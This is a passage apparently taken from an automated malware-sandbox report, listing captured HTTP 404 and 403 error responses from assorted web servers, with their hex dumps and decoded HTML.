74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 17:50:07 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:18 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidatecontent-encoding: gzipcontent-type: text/html; charset=utf-8date: Sun, 23 Oct 2022 15:57:18 GMTserver: Fly/51c45b355 (2022-10-19)x-request-id: FyC94aPk5IH3-hUAA0wxtransfer-encoding: chunkedvia: 1.1 fly.iofly-request-id: 01GG2S04BTBKP6Y6FHCSKWQRF6-amsData Raw: 32 31 35 0d 0a 1f 8b 08 00 00 00 00 00 04 ff b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 b2 01 51 0a 39 89 79 e9 b6 4a a9 79 4a 76 5c 0a 0a 36 19 a9 89 29 20 86 82 82 4d 6e 6a 49 a2 42 72 46 62 51 71 6a 89 ad 52 69 49 9a ae 85 92 3e b2 5c 46 49 49 81 6e 6a 61 69 66 99 ad 52 84 6e a8 a3 ae 73 7e 6e 41 62 49 66 52 4e aa 92 42 72 7e 5e 49 6a 5e 89 ad 92 a7 ab 6d 6a 4a 7a 2a aa d6 bc c4 dc 54 5b a5 b2 cc d4 f2 82 fc a2 12 24 d5 e5 99 29 25 19 b6 29 a9 65 99 c9 a9 ba 60 8e 8e 42 66 5e 66 49 66 62 8e 6e 71 72 62 4e aa ad a1 9e 01 dc ac 9c cc bc 6c 85 a2 d4 1c 5b a5 cc e4 fc 3c 25 85 92 ca 82 54 5b a5 cc dc c4 f4 54 fd e2 b2 74 ed 8a dc 1c 25 85 8c a2 d4 34 5b 25 fd b4 c4 32 90 22 bd e2 b2 74 25 05 98 3f 4a 32 4b 72 52 ed 4c 0c 4c 14 74 15 7c 32 cb 52 93 f2 f3 b3 6d f4 21 a2 5c 0a 0a 0a 0a 36 08 2b 8a 4b 2a 73 52 8b 33 52 53 4b e0 66 26 17 17 eb 27 16 14 e8 25 17 17 43 dc 64 a3 0f 0b 40 9b a4 fc 94 4a 68 68 a5 64 96 29 24 e7 24 16 17 db 2a 65 e8 16 27 17 a5 a6 e6 29 a4 e5 a4 56 28 64 96 a4 e6 16 eb 26 a7 e6 95 a4 16 29 64 95 16 97 64 a6 55 c2 b8 49 e9 ba e9 45 89 95 ba 96 06 06 e0 a8 01 bb 06 c9 24 b0 01 20 42 37 39 3f 47 a1 b8 20 31 39 55 b7 12 30 5d 13 14 33 e1 1a 15 14 6c 12 61 01 81 24 a8 a0 60 93 99 9b ae 50 5c 94 6c ab a4 0f 0e b6 62 fd 9c fc f4 7c bd 82 bc 74 25 85 8c d4 cc f4 8c 12 5b 25 43 23 0b 25 05 70 5c 40 d9 89 39 25 b6 4a 39 d0 e0 82 07 26 d8 81 fa 89 10 3f 83 39 48 ae 2d 49 ad 28 d1 35 aa c8 51 00 33 c0 1e 33 45 f8 0b a4 da 2f 5f c1 af 34 37 29 b1 a4 58 21 23 b5 28 55 11 1c fc 20 09 1b fd 94 cc 32 98 a9 48 1c 38 d3 46 1f 12 d6 36 fa a0 04 6d c7 05 00 37 c1 8d e4 e8 02 00 00 0d 0a Data Ascii: 215QtwpU(Q9yJyJv\6) MnjIBrFbQqjRiI>\FIInjaifRns~nAbIfRNBr~^Ij^mjJz*T[$)%)e`Bf^fIfbnqrbNl[<%T[Tt%4[%2"t%?J2KrRLLt|2Rm!\6+K*sR3RSKf&'%Cd@Jhhd)$$*e')V(d&)ddUIE$ B79?G 19U0]3la$`P\lb|t%[%C#%p\@9%J9&?9H-I(5Q33E/_47)X!#(U 2H8F6m7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 11:49:34 GMTServer: WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Wed, 14 Jan 1970 15:21:59 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/octet-streamContent-Length: 120Connection: CloseData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>404 File Not Found</title></head><body>The requested URL was not found on this server</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:22 GMTServer: ApacheVary: accept-language,accept-charsetUpgrade: h2Connection: UpgradeAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 30 62 0d 0a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 33 0d 0a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:25 GMTServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesKeep-Alive: timeout=15, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 23:50:38 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:57:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:57:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 23:57:17 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: closeAuthInfo:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:29 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 